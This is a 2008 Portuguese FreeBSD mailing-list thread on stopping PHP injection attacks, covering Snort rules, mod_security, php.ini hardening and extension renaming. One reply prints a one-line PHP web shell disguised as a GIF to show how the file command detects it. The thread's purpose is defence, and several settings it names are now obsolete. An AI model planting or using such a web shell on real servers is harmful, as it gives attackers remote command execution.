opa Marcelo.. bem colocado sua sugestao de footprint .. é preciso mudar o
banner do apache e do SO tbm... :)


---------- Original Message -----------
From: "Marcelo M. Fleury" <[EMAIL PROTECTED]>
To: "Lista Brasileira de Discussão sobre FreeBSD (FUG-BR)" <freebsd@fug.com.br>
Sent: Fri, 22 Feb 2008 11:10:56 -0300
Subject: Re: [FUG-BR] OT-Ataque PHP injection

> Bom,
> 
> a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom esclarecer
> isso, a maioria das respostas é como evitar os ataques, mas eu 
> entendi que ela quer garantir que em seu servidor não tenha códigos 
> maliciosos, capazes de prover ataques em OUTROS servidores e não no dela...
> 
> Gustavo, acrescentaria na sua lista o magic_quotes_gpc.... de 
> qualquer formar, acredito que todas devem ser analisadas, buscando 
> mensurar o impacto nos sistemas existentes...
> 
> com relação a alterar a extensão do php, não sei até que ponto isso é
> valido... teria que se alterar o banner do apache também, dentre outras
> coisas( eu acho )... ataques de footprint são cada vez mais sofisticados...
> 
> []s
> 
> Em 22/02/08, Gustavo Polillo Correa <[EMAIL PROTECTED]> escreveu:
> >
> >
> > no php.ini vc pode fazer :
> >
> > disable_functions = system,exec
> >
> > isso fara com que o php nao execute as funcoes system() e nem exec()..
> > dando
> > maior seguranca a ataques desse tipo.. outras variaveis interessantes para
> > prover maior seguranca no php sao:
> >
> > safe_mode= On
> > safe_mode_gid=Off
> > expose_php=Off
> > register_globals=Off (sem comentarios.. rsrs)
> > dispaly_error=Off
> > log_eroor=On
> > error_log=php_erro.log
> >
> > Considerando que seu php nao emitira erros, vale ainda configurar o
> > apache:
> >
> > trocar :
> > AddType application/x-httpd-php .php
> >
> > Por:
> > AddType application/x-httpd-php .jsp
> >
> > Ou
> > AddType application/x-httpd-php .dhmtl
> >
> > Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso
> > dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara
> > que
> > é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar
> > a
> > variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc
> > sta
> > usando..
> >
> > isso ajuda mas nao evita ataques contra programacao mal feita!!
> >
> > modsecurity do apache é muito bom... acho que todos deveriam ter... com
> > bons
> > filtros.. ajuda muuuito!!
> >
> > ate.
> >
> > Gustavo Polillo Correa.
> >
> >
> >
> >
> >
> > ---------- Original Message -----------
> > From: "Marcelo M. Fleury" <[EMAIL PROTECTED]>
> > To: "Lista Brasileira de Discussão sobre FreeBSD (FUG-BR)" <
> > freebsd@fug.com.br>
> > Sent: Fri, 22 Feb 2008 09:59:32 -0300
> > Subject: Re: [FUG-BR] OT-Ataque PHP injection
> >
> > > Olá,
> > >
> > > até onde eu entendi, o interesse da Cristina é em não ser uma
> > > provedora de códigos maliciosos, no caso PHP.
> > >
> > > Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de
> > ataques
> > > a rede/host, e sim de que a rede ou host seja uma provedora de
> > > ataques... na realidade não conheço solução voltada para isso...
> > > existe o mod_security do apache que pode te ajudar a monitorar e
> > > filtrar suas aplicações.
> > >
> > > Penso em algum programa que cheque a integridade de arquivos no
> > > servidor, algo parecido com o file:
> > >
> > > [EMAIL PROTECTED]:~$ cat sh.gif
> > > <?php
> > >         system($_GET['sh']);
> > > ?>
> > > [EMAIL PROTECTED]:~$ file sh.gif
> > > sh.gif: PHP script text
> > >
> > > e depois, habilitar alguns filtros no mod_security buscando checar
> > qualquer
> > > uso indevido do php... confesso que não conheço muito o mod_security,
> > >  uma vez que não trampo mais como sysadmin e sim como
> > > desenvolvedor(quero arrumar um tempo para brincar com ele).
> > >
> > > Acredito que no mais é realizar auditorias... procurar nos logs do
> > apache
> > > por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,
> > > awk não resolva!
> > >
> > > Espero ter ajudado, boa sorte!
> > >
> > > Em 22/02/08, William Grzybowski <[EMAIL PROTECTED]> escreveu:
> > > >
> > > > Oi Patrick,
> > > >
> > > > Não sei se entendi muito bem, poderia me dar uma luz?
> > > > Php injection, como próprio nome ja diz é a inserção de codigo php
> > > > causado por código mal escrito que permito o injeção de código php
> > > > externo no servidor, correto?
> > > >
> > > > Como que funcionam essas regras que você falou? Essas empresas liberam
> > > > regras que atuam (obviamente) na ""camada"" do HTTP e analizam o
> > > > trafego para os softwares vulneraveis que eles tem conhecimento e
> > > > inclusao direta de scripts em servidores externos?
> > > >
> > > > Vlw
> > > >
> > > > 2008/2/21 Patrick Tracanelli <[EMAIL PROTECTED]>:
> > > >
> > > > > Cristina Fernandes Silva escreveu:
> > > > >
> > > > > > É cobrada essas regras ? Vc tem alguma faixa de preço  ? é
> > apllicance
> > > > >  > ? ou somente as regras que posso usar no snort.
> > > > >
> > > > >  Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
> > > > >  precos. Eles confiam no que voce diz: Se voce diz que é pequeno
> > porte,
> > > > >  não importa se é uma multinacional, pagara como pequeno. No site da
> > > > >  SourceFire tem todos os detalhes sobre preços.
> > > > >
> > > > >  São só as regras a principio, mas pode comprar o sistema deles. Não
> > > > >  conheço quem use no país o sistema deles. Mas não parece ser mais
> > do
> > > > que
> > > > >  o Snort com um front-end muito amigável.
> > > > >
> > > > >  No caso da Juniper tem direito automaticamente a versão convertida
> > pra
> > > > >  Snort todos que tem Juniper série 5000 e já pague a licença anual
> > do
> > > > IPS
> > > > >  (que é um add-on no firewall Juniper).
> > > > >
> > > > >  No Brasil quem representa a venda das assinaturas Source Fire é a
> > > > >  BRConnection.
> > > > >
> > > > >
> > > > >
> > > > >  >
> > > > >  >
> > > > >  >
> > > > >  > Em 21/02/08, Patrick Tracanelli<[EMAIL PROTECTED]>
> > > > escreveu:
> > > > >  >> Cristina Fernandes Silva escreveu:
> > > > >  >>
> > > > >  >>> Acho que não fui clara, Vou explicar,
> > > > >  >>  >
> > > > >  >>  > Quero evitar que alguem da minha rede use o meu ip  (endereço
> > )
> > > > para
> > > > >  >>  > fazer ataques
> > > > >  >>  > de php injection para outro endereço externo. Até mesmo os
> > meus
> > > > >  >>  > usuarios interno fazer algum ataque para servidores
> > externos..
> > > > >  >>
> > > > >  >>
> > > > >  >> Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O
> > nível
> > > > de
> > > > >  >>  satisfação vai depender da qualidade das regras de análise de
> > > > instrusão
> > > > >  >>  que você utilizar. Isso quer dizer que dependendo do nível de
> > > > seriedade
> > > > >  >>  da empresa será proveitoso assinar um serviço (comercial) que
> > > > oferece
> > > > >  >>  regras testadas e atualizadas. Apesar da escolha natural ser
> > Source
> > > > >  >>  Fire, minha escolha pessoal (e sugestão) é pelas regras
> > fornecidas
> > > > pela
> > > > >  >>  Juniper. São as mesmas utilizadas no Juniper série 5000,
> > > > convertidas pro
> > > > >  >>  Snort.
> > > > >  >>
> > > > >  >> -------------------------
> > > > >  >>  Histórico: http://www.fug.com.br/historico/html/freebsd/
> > > > >  >>  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> > > > >  >>
> > > > >  > -------------------------
> > > > >  > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > > > >  > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> > > > >
> > > > >  -------------------------
> > > > >  Histórico: http://www.fug.com.br/historico/html/freebsd/
> > > > >  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> > > > >
> > > >
> > > >
> > > >
> > > >
> > > > --
> > > >
> > > > William Grzybowski
> > > > ------------------------------------------
> > > > Jabber: william88 at gmail dot com
> > > > Curitiba/PR - Brazil
> > > > -------------------------
> > > >
> > > > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > > > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> > > >
> > >
> > > --
> > > Att, Marcelo M. Fleury
> > > Linux User: #369521
> > > Blog - http://marcelomf.blogspot.com/
> > >
> > > "Não basta saber, é preciso também aplicar; não basta querer é
> > > preciso também agir" By Goethe
> > > -------------------------
> > > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
> > ------- End of Original Message -------
> >
> >
> > -------------------------
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
> 
> -- 
> Att, Marcelo M. Fleury
> Linux User: #369521
> Blog - http://marcelomf.blogspot.com/
> 
> "Não basta saber, é preciso também aplicar; não basta querer é 
> preciso também agir" By Goethe
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
------- End of Original Message -------

-------------------------
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Responder a